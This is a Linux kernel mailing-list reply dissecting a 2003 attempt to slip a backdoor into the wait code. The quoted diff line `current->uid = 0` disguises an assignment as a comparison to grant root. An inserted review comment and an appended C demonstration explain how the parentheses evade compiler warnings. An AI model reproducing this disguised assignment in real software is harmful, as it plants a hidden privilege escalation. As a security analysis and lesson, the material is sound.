Re: BK2CVS problem

From: Brian McGroarty
Date: Thu Nov 06 2003 - 02:08:09 EST


On Wed, Nov 05, 2003 at 11:51:34PM +0100, Andries Brouwer wrote:
> On Wed, Nov 05, 2003 at 05:33:40PM -0500, Zwane Mwaikambo wrote:
> > On Wed, 5 Nov 2003, Larry McVoy wrote:
> >
> > > On Wed, Nov 05, 2003 at 12:58:13PM -0800, Matthew Dharm wrote:
> > > > Out of curiosity, what were the changed lines?
> > >
> > > --- GOOD 2003-11-05 13:46:44.000000000 -0800
> > > +++ BAD 2003-11-05 13:46:53.000000000 -0800
> > > @@ -1111,6 +1111,8 @@
> > > schedule();
> > > goto repeat;
> > > }
> > > + if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
> > > + retval = -EINVAL;
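Review bot: the right-hand operand of `&&` in `+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))` is an assignment, not a comparison. `current->uid = 0` stores zero and evaluates to 0, so the whole condition is always false, the `+ retval = -EINVAL;` line is unreachable, and the hunk's only runtime effect is to set the calling process's uid to 0 whenever `options` is exactly `__WCLONE|__WALL`. A check that rejected that flag combination for root would read `current->uid == 0`; but since the assignment is deliberately wrapped in its own parentheses and guards dead code, the change should be rejected outright rather than corrected, and its origin traced.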
> >
> > That looks odd
>
> Not if you hope to get root.

You got it. Short-circuiting will make the second half of the
conditional execute only when the first half is true. So if options
equals __WCLONE|__WALL exactly, then the user is changed to root.

I believe the two flags would normally be mutually exclusive (why
would you wait on everything as well as waiting on only non-SIGCHLD?)
so having to set the strange process flags makes it look like a local
exploit.

I wonder why someone who thought they had access to the tree wouldn't
have tried to make something that worked remotely?
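The behaviour described in the reply above, written out as an added C example (not code from this thread or from the kernel): a constructed `struct task` stands in for the kernel's task structure, the flag values are the ones Linux defines in `<linux/wait.h>`, `check_as_committed` carries the quoted condition verbatim, and `check_with_comparison` is the comparison a reader skimming the hunk would assume it contains. The helper functions `retval_for` and `uid_after` are constructed for the demonstration.

```c
#include <errno.h>
#include <stdio.h>

/* Constructed stand-in for the kernel's task structure; only uid matters here. */
struct task {
    unsigned int uid;
};

/* Flag values as defined in Linux <linux/wait.h>; any two distinct bits would do. */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

/* The condition exactly as it appears in the quoted hunk. The second operand is an
 * assignment: it stores 0 into uid and yields 0, so retval = -EINVAL never runs. */
int check_as_committed(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The same line with a comparison: rejects the flag combination for root and
 * never modifies uid. */
int check_with_comparison(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Demonstration helpers (constructed): run one check on a fresh task with the
 * given starting uid and report the return value or the uid afterwards. */
int retval_for(int (*check)(struct task *, unsigned int),
               unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    return check(&t, options);
}

unsigned int uid_after(int (*check)(struct task *, unsigned int),
                       unsigned int uid, unsigned int options)
{
    struct task t = { uid };
    check(&t, options);
    return t.uid;
}

int main(void)
{
    unsigned int both = __WCLONE|__WALL;
    printf("as committed:   options=both  retval=%d uid 1000 -> %u\n",
           retval_for(check_as_committed, 1000, both),
           uid_after(check_as_committed, 1000, both));
    printf("as committed:   options=WALL  retval=%d uid 1000 -> %u\n",
           retval_for(check_as_committed, 1000, __WALL),
           uid_after(check_as_committed, 1000, __WALL));
    printf("with ==:        options=both  retval=%d uid 1000 -> %u\n",
           retval_for(check_with_comparison, 1000, both),
           uid_after(check_with_comparison, 1000, both));
    printf("with ==, root:  options=both  retval=%d uid 0 -> %u\n",
           retval_for(check_with_comparison, 0, both),
           uid_after(check_with_comparison, 0, both));
    return 0;
}
```

The extra parentheses around `current->uid = 0` are what keep gcc's `-Wparentheses` ("suggest parentheses around assignment used as truth value") quiet, so a build with `-Wall` gives no hint. Catching this relies on a reviewer reading the operators rather than the shape of the line, or on a lint rule that flags any assignment inside an `if` condition regardless of parenthesization.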
